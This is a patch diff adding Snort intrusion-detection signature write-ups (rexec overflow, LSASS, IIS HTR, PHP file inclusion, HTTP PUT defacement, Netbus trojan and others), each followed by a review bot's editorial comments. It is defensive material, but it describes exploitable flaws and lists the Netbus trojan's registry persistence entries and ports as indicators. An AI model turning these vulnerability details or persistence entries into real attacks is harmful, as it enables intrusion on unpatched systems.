+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
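Review bot: Detailed Information describes unchecked user input leading to PHP code execution and file inclusion, but Attack Scenarios is the generic "access an authentication mechanism and supply his/her own credentials" text, which does not match; replace it with the inclusion/code-execution scenario the previous section describes. "handling user input, this may lead" is a comma splice (use a full stop or semicolon), and "the attackers choosing" needs an apostrophe. Additional References is empty for a specific product version; cite the advisory if one exists.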
--- /dev/null
+++ b/doc/signatures/1628.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+1628
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
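Review bot: Affected Systems is empty, yet Detailed Information names "web, web applications and ftp servers" as the usual targets; at minimum that list belongs there. Attack Scenarios speaks only of "folders outside the ftp root directory" while the rest of the entry describes a generic directory traversal signature; either state that the rule is FTP-specific or broaden the scenario. Minor: "web, web applications" should read "web servers, web applications", and the "None known" lines and "Apply the appropriate vendor supplied patches" lack the terminating full stops used in neighbouring entries.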
--- /dev/null
+++ b/doc/signatures/1717.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1717
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
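Review bot: "running ona web server" should be "running on a web server", and "the attackers choosing" (twice) needs an apostrophe. The Summary promises "a known vulnerability in a CGI web application" but nothing in the entry identifies the application or the vulnerability, and Additional References is empty; if the rule is generic, say so in the Summary, otherwise name the target and cite it.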
--- /dev/null
+++ b/doc/signatures/2104.txt
@@ -0,0 +1,52 @@
+Rule:
+
+--
+Sid:
+2104
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a vulnerability in the rexec daemon is unsucessful. This event is an indication that someone supplied an overly long username to the rexec daemon.
+
+--
+Impact:
+Serious.  An attacker may gain escalated privileges offering super user access on the affected host.
+
+--
+Detailed Information:
+Rexec offers users the ability to execute commands on a host from remote locations.
+
+A vulnerability exists such that an when an overly long username is supplied to the rexec daemon, a buffer overflow condition may occur thus presenting the attacker with the opportunity to execute arbitrary code and possibly gain escalated privileges on the target host.
+
+--
+Attack Scenarios:
+Simple.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Disallow rexec commands from sources external to the protected network.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
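Review bot: the Summary sentence is broken: "when an attempt is made to exploit a vulnerability in the rexec daemon is unsucessful" has two main verbs and a misspelling; suggest "when an unsuccessful attempt is made to exploit a vulnerability in the rexec daemon". Attack Scenarios reads "Simple.", which is the Ease of Attack wording rather than a scenario; describe the overly long username being supplied (as the Summary already does) or omit the section. Also "an when" in Detailed Information should be "when", and this entry has no Affected Systems section at all, unlike the rest of the patch.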
--- /dev/null
+++ b/doc/signatures/2512.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2512
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overrun condition in Microsoft products via the Local Security Authority
+Subsystem Service (LSASS).
+
+--
+Impact:
+Remote execution of arbitrary code.
+
+--
+Detailed Information:
+A vulnerability exists in LSASS that may present an attacker with the
+opportunity to execute code of their choosing on an affected host.
+
+The problem lies in an unchecked buffer in the LSASS service, suscessful
+exploitation may present the attacker with the opportunity to gain
+control of the affected system.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems.
+
+--
+Attack Scenarios:
+An attcker needs to make a specially crafted request to the LSASS
+service that could contain harmful code to gain further access to the
+system.
+
+--
+Ease of Attack:
+Moderate.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Use a packet filtering firewall to deny access to TCP and UDP ports 135
+and 445, UDP ports 137 and 138 and TCP ports 139 and 593 from resources
+outside the protected network.
+
+Access should also be denied to ephemeral ports and any other ports used
+by RPC services from sources external to the protected network.
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
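Review bot: "The problem lies in an unchecked buffer in the LSASS service, suscessful exploitation may present..." is a comma splice with a misspelling; split it into two sentences and use "successful". Spelling: "attcker" in Attack Scenarios. The first Corrective Action line lacks a full stop. Additional References is empty although Affected Systems names specific Windows versions; the vendor bulletin for the LSASS buffer overrun should be cited.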
--- /dev/null
+++ b/doc/signatures/1178.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1178
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a PHP web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a PHP application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the PHP application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running PHP applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
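Review bot: "running ona web server" should be "running on a web server", and "the attackers choosing" needs an apostrophe in both Impact and Detailed Information. The Summary's "known vulnerability in a PHP web application" is never identified and Additional References is empty; if this is a generic PHP rule, say so, otherwise name the application and cite the advisory.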
--- /dev/null
+++ b/doc/signatures/1143.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1143
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
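Review bot: "Many known vulnerabilities exist for each implementation and the attack scenarios are legion" tells the reader nothing about what the rule matches; either describe the class of request the signature looks for or drop the sentence. Capitalisation of "Web server" versus "web server" is inconsistent within Detailed Information, and "the attackers choosing" in Impact needs an apostrophe.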
--- /dev/null
+++ b/doc/signatures/100000751.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000751
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Free QBoard" application running on a webserver. Access to the file "about.php" using a remote file being passed as the "qb_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "qb_path" parameter in the "about.php" script used by the "Free QBoard" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Free QBoard
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
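Review bot: the separator layout differs from the other entries: the "--" after the Sid value, after "All systems running CGI applications using Free QBoard" and after the Contributors list is not preceded by a blank line, so keep the blank-line-before-separator convention the rest of the patch uses. The credential-validation paragraph in Detailed Information and the Attack Scenarios text describe a different attack than the remote file include on "qb_path" that the Summary documents; reword them around file inclusion. "running ona web server" and "the attackers choosing" also need fixing, and "an exploitation attempt has been attempted" is redundant.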
--- /dev/null
+++ b/doc/signatures/2543.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+2543
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of SSL Version 3.
+
+--
+Impact:
+Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in the handling of SSL Version 3 requests that
+can be manipulated to cause a DoS condition in various software 
+implementations used on Microsoft operating systems.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library. SSL requests containing an
+invalid field, sent to vulnerable systems can cause the affected host to stop 
+handling any further requests.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems using SSL
+
+--
+Attack Scenarios:
+An attcker needs to make an SSL request to an affected system that
+contains an invalid field.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+US-CERT:
+http://www.us-cert.gov/cas/techalerts/TA04-104A.html
+
+--
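Review bot: spelling "attcker" in Attack Scenarios. The sentence "SSL requests containing an invalid field, sent to vulnerable systems can cause the affected host to stop handling any further requests" has an unmatched comma; either remove it or bracket the clause ("requests containing an invalid field, sent to vulnerable systems, can cause ..."). The Corrective Action line lacks a full stop.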
--- /dev/null
+++ b/doc/signatures/999.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 999
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation on the host, this may be the prelude to an attack against that host using that information.
+
+The attacker may also be trying to gain administrator access to the host, garner information on users of the system or retrieve sensitive customer information.
+
+Some applications may store sensitive information such as database connections, user information, passwords and customer information in files accessible via a web interface. Care should be taken to ensure these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS implementation. The attacker might then gain administrator access to the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
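Review bot: the Sid is written inline ("Sid: 999") and followed by two blank lines, whereas every other entry puts the number on its own line under "Sid:"; normalise to the two-line form. Impact reads "Information gathering possible administrator access." and needs a separator ("Information gathering; possible administrator access."). "on the host, this may be the prelude to an attack" in Detailed Information is a comma splice.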
--- /dev/null
+++ b/doc/signatures/100000316.txt
@@ -0,0 +1,71 @@
+Rule:  
+
+--
+Sid:
+100000315
+
+--
+Summary:
+This event is generated when an HTTP server issues a successful status
+code in response to a request to update a web document via the PUT method.
+
+--
+Impact:
+The PUT method is a legitimate HTTP command that allows an authorized user
+to upload a document into the web content tree. It is most often associated 
+with the WebDAV content management protocol.  
+
+Although there are some legitimate uses for the PUT method, it is also a
+frequent source of web site defacement, as attackers can easily abuse 
+misconfigured web servers that allow unrestricted PUT functionality from 
+arbitrary users.
+
+--
+Detailed Information:
+The rule searches for replies to HTTP PUT requests which indicate success.  
+When a successful reply is seen, it implies that the web content area has
+been modified, which may be an indicaton that the web site has been 
+defaced.
+
+This rule is intended to be used with another SID 100000315, which detects
+HTTP PUT requests.
+
+--
+Affected Systems:
+Any web server
+
+--
+Attack Scenarios:
+An attacker can issue a PUT reuqest via a script, many different pieces of 
+software, or through a manual connection to any web server port.
+
+--
+Ease of Attack:
+Simple.  Numerous tools exist for creating PUT requests, including some geared
+specifically towards web site defacement.  
+
+--
+False Positives:
+Organizations that use WebDAV to manage their web content may experience
+false positives, as the PUT method is a normal part of the WebDAV protocol.
+Additionally, any other legitimate web applications which use the PUT method
+will generate false positives.
+
+--
+False Negatives:
+None
+
+--
+Corrective Action:
+In cases of web site defacement, delete the newly-created file(s) and/or 
+restore them from a reliable backup. In all cases, be sure to tune web server
+configuration to allow PUT requests only where necessary for a legitimate web
+application to function.
+
+--
+Contributors:
+David J. Bianco, <david@vorant.com>
+
+-- 
+Additional References:
+http://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html#sec9.6
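Review bot: the Sid value is wrong: the file is 100000316.txt and Detailed Information says the rule "is intended to be used with another SID 100000315", yet the Sid field reads 100000315; it should be 100000316. The entry also lacks the closing "--" line after the reference URL that every other entry ends with. Spelling: "indicaton" in Detailed Information and "reuqest" in Attack Scenarios; "False Negatives: None" should be "None known" to match the rest of the patch.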
--- /dev/null
+++ b/doc/signatures/1359.txt
@@ -0,0 +1,56 @@
+Rule: 
+
+--
+Sid: 1359
+
+-- 
+Summary: 
+A web command execution attack involving the use of a "ping" command
+
+-- 
+Impact: 
+Possible intelligence gathering activity. 
+
+-- 
+Detailed Information: 
+The attacker may have gained the ability to execute system commands remotely or the web server may be incorrectly configured to allow such access.
+
+This rule generates an event when a "ping" command is used over a plain-text (unencrypted) connection on one of the specified web ports to the target web server. The "ping" command may be used to perform information gathering activities.
+
+The rule looks for the "ping" command in the client to web server network traffic and does not indicate whether the command was actually successful. The presence of the "ping" command in the URI indicates that an attacker attempted to trick the web server into executing system in non-interactive mode i.e. without a valid shell session.
+
+Alternatively this rule may generate an event in an unencrypted HTTP tunneling connection to the server or a shell connection via another exploit against the web server.
+
+-- 
+Attack Scenarios: 
+An attacker uses a "ping" command to perform anonymous reconnaissance
+
+--
+Ease of Attack: 
+Simple. No exploit software required
+
+-- 
+False Positives: 
+none known
+
+--
+False Negatives: 
+none known
+
+-- 
+Corrective Action: 
+Check the web server software for vulnerabilities and possible upgrades or patches for the system to the latest version of the web software, also investigate the server logs for signs of compromise
+
+Webservers should not be allowed to view or execute files and binaries outside of it's designated web root or cgi-bin. Disallowing execution of this binary via a URI is suggested.
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+
+-- 
+Additional References:
+
+--
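Review bot: "trick the web server into executing system in non-interactive mode" is missing a noun (presumably "system commands"). "outside of it's designated web root" should be "its", and "Webservers" should match the entry's own "web server" spelling. Impact says only "Possible intelligence gathering activity" although Detailed Information states the attacker "may have gained the ability to execute system commands remotely"; Impact should reflect that command-execution risk. The lower-case "none known" entries differ from the capitalised form used elsewhere in the patch.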
--- /dev/null
+++ b/doc/signatures/2082.txt
@@ -0,0 +1,78 @@
+Rule:
+
+--
+Sid:
+2082
+
+--
+Summary:
+number for the rpc service xfsmd
+
+--
+Impact:
+Intelligence gathering
+
+--
+Detailed Information:
+This may be an attacker probing for vulnerable versions of rpc services.
+In this case, the rpc service xfsmd.
+
+It is possible for an attacker to supply a meta character followed by
+any commands or code of his choosing to the xfsmd daemon.
+
+Due to a programming error, the service does not correctly check for the
+characters and they are not stripped from the request.
+
+The xfsmd daemon is not installed by default on IRIX systems but it is 
+part of an optional package.
+
+--
+Affected Systems:
+	IRIX 6.2
+	IRIX 6.3
+	IRIX 6.4
+	IRIX 6.5.x
+
+--
+Attack Scenarios:
+Exploits are widely available.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Patches are NOT available for this issue.
+
+Disable and remove the xfsmd daemon.
+
+Uprade to the latest non affected version of the operating system
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/5075
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0359
+
+SGI IRIX:
+ftp://patches.sgi.com/support/free/security/advisories/20020606-01-I
+
+--
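Review bot: the Summary starts mid-sentence: "number for the rpc service xfsmd" has lost its opening clause and should be completed rather than left as a fragment. "Exploits are widely available." under Attack Scenarios is an Ease of Attack statement (which currently just says "Simple"); the scenario itself is the meta character followed by commands described in Detailed Information. Spelling: "Uprade" in Corrective Action, and "non affected" should be hyphenated as in the other entries.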
--- /dev/null
+++ b/doc/signatures/1421.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+1421
+
+--
+Summary:
+This event is generated when an attempt is made to attack a device using
+SNMP v1.
+
+--
+Impact:
+Varies depending on the implementation. Ranges from Denial of Service 
+(DoS) to code execution.
+
+--
+Detailed Information:
+SNMP is a widely adopted protocol for managing IP networks, including 
+individual network devices, and devices in aggregate. 
+
+Several network devices come pre-installed with this protocol for 
+management and monitoring.
+
+A number of vulnerabilities exist in SNMP v1, including a community 
+string buffer overflow, that will allow an attacker to execute arbitrary
+code or shutdown the service.
+
+--
+Affected Systems:
+Any implementation of the SNMP v1 protocol
+
+--
+Attack Scenarios:
+An attacker needs to send a specially crafted packet to UDP port 705
+of a vulnerable device, causing a Denial of Service or possible 
+execution of arbitrary code.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disable the SNMP v1 protocol, use SNMP v2 protocol as an alternative.
+
+Disable the use of SNMP for devices that do not need it.
+
+Use Ingress/Egress filtering on a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Nawapong Nakjang (tony@ksc.net, tonie@thai.com)
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0012
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0013
+
+--
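Review bot: Attack Scenarios pins the attack to "UDP port 705", but nothing else in the entry (Summary, Detailed Information, Corrective Action) mentions that port or transport, and the rest of the text speaks of SNMP v1 generally; confirm the port and protocol against the rule header and state them consistently, or drop the port from the scenario. "Several network devices come pre-installed with this protocol" understates the point ("Many"), and "shutdown the service" should be "shut down the service".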
--- /dev/null
+++ b/doc/signatures/2399.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+2399
+
+--
+Summary:
+This event is generated when an attempt is made to exploit the PHP web
+application WAnewsletter.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the WAnewsletter PHP web application running on a server.
+Multiple vulnerabilities exist in the application which can lead to the
+execution of arbitrary code of the atttackers choosing.
+
+--
+Affected Systems:
+	WAnewsletter
+
+--
+Attack Scenarios:
+An attacker can supply code of their choice by including a file in
+parameters supplied to the script newsletter.php or db_type.php.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
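Review bot: Additional References is empty although Summary and Detailed Information describe a "known vulnerability" in WAnewsletter with specific scripts (newsletter.php, db_type.php); add the advisory, Bugtraq or CVE identifier the rule was written from so the file-include claim can be checked. Typo in Detailed Information: "atttackers" should be "attackers".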
--- /dev/null
+++ b/doc/signatures/1806.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+1806
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow associated with chunked encoding processing of HTR in Internet Information Services (IIS). 
+
+--
+Impact:
+Remote Access.  If the exploit is successful, an attacker can gain remote access of the target host. 
+
+--
+Detailed Information:
+A buffer overflow exists with chunked encoding processing associated with HTR in IIS.  Chunked encoding allows different sized chunks of data to be passed from the web client to the server.  HTR is an older scripting language still supported by IIS. A heap overflow vulnerability exists because of an error in chunked encoding data transfer associated with the Internet Services Application Programming Interface (ISAPI) extension that implements HTR.
+
+--
+Affected Systems:
+
+Microsoft IIS 4.0, 5.0 
+
+--
+Attack Scenarios:
+An attacker can craft a chunked encoded request to exploit the heap overflow.
+
+--
+Ease of Attack:
+Moderate.  Microsoft advises that this heap overflow is not as difficult to exploit as others.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+
+Apply the appropriate patch:
+
+  Microsoft IIS 4.0:
+     http://www.microsoft.com/Downloads/Release.asp?ReleaseID=39579
+  Microsoft IIS 5.0:
+     http://www.microsoft.com/Downloads/Release.asp?ReleaseID=39217 
+
+Investigate running the IIS Lockdown Tool to disable HTR functionality.
+
+--
+Contributors:
+Original rule written by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0364
+
+Bugtraq
+http://www.securityfocus.com/bid/4855
+
+Microsoft
+http://www.microsoft.com/technet/security/bulletin/ms02-028.asp
+
+--
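Review bot: The Ease of Attack wording ("Moderate.  Microsoft advises that this heap overflow is not as difficult to exploit as others.") reads as contradicting its own rating; if the point is that the overflow is harder than a typical stack overflow but still practical, say so plainly. In Corrective Action the ReleaseID download URLs age badly, so the bulletin already listed under Additional References (ms02-028) should be the primary pointer, and since Detailed Information places the flaw in the ISAPI extension that implements HTR, a line stating that disabling the HTR mapping removes the vulnerable code path would give readers a mitigation independent of the download links.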
--- /dev/null
+++ b/doc/signatures/109.txt
@@ -0,0 +1,103 @@
+Rule:
+
+--
+Sid:
+109
+
+--
+Summary:
+Netbus is a Trojan Horse.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine. This Trojan also has the ability to scan machines and networks for open ports, it can also redirect legitimate traffic to other destinations. It can turn the infected host into an open proxy server.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+	Windows NT
+	Windows 2000
+	Windows XP
+
+The Trojan changes system registry settings to add the Netbus sever to programs normally started on boot. Due to the nature of this Trojan it is unlikely that the attacker's client IP address has been spoofed.
+
+	SID	Message
+	---	-------
+	109	netbus active (outgoing TCP connection)
+	110	netbus getinfo (incoming TCP connection)
+	115	netbus active (outgoing TCP connection)
+
+Server ports usually opened may be one of the following depending on the version of netbus: 12345, 12346, 20034
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This event is indicative of an existing infection being activated. Initial compromise can be in the form of a Win32 installation program that may use the extension ".jpg" or ".bmp" when delivered via e-mail for example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised. Updated virus definition files are essential in detecting this Trojan.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+The manual removal of this Trojan should only be attempted by an experienced Windows system administrator.
+
+Edit the system registry to remove the extra keys or restore a previously known good copy of the registry.
+
+Affected registry keys are:
+
+	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\
+	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
+
+Registry keys added include:
+
+	Netbus Server Pro
+	PATCH "C:\windows\patch.exe /nomsg" - note: the entry may not necessarily be called PATCH
+	NetBuster = ""
+	SysCopy = "command /c copy %windir%\\keyhook.dl_ %windir%\\*.dll /Y"
+	Rundll32 = "rundll.dl_ /noadd"
+	Rundll = "regedit /s nbsetup2.reg"
+
+Later versions may also add one of these registry entries:
+
+	HKEY_LOCAL_MACHINE/SOFTWARE/UltraAccess Networks/NetBus Server/
+	HKEY_CURRENT_USER/NetBus Server/
+
+These entries should be deleted.
+
+The files rundll.dl_ (note the underscore, this is important) and nbsetup2.reg should be deleted if they exist.
+
+Ending the process is necessary. A reboot of the infected machine is recommended.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS401
+http://www.whitehats.com/info/IDS403
+
+Hackfix.org
+http://www.hackfix.org/netbusfix/index.shtml
+
+Dark-e Trojan Archive
+http://www.dark-e.com/archive/trojans/netbus/index.html
+
+--
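Review bot: The SID/message table lists the same message, "netbus active (outgoing TCP connection)", for both SID 109 and SID 115, so a reader cannot tell what distinguishes the two rules; confirm the messages and describe the difference. The registry paths are also inconsistent: the first group uses backslashes ("RunServices\" with a trailing separator) while the "Later versions" group uses forward slashes ("HKEY_LOCAL_MACHINE/SOFTWARE/UltraAccess Networks/NetBus Server/"), which is not valid registry path syntax; normalise to backslashes. Typo in Detailed Information: "Netbus sever".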
--- /dev/null
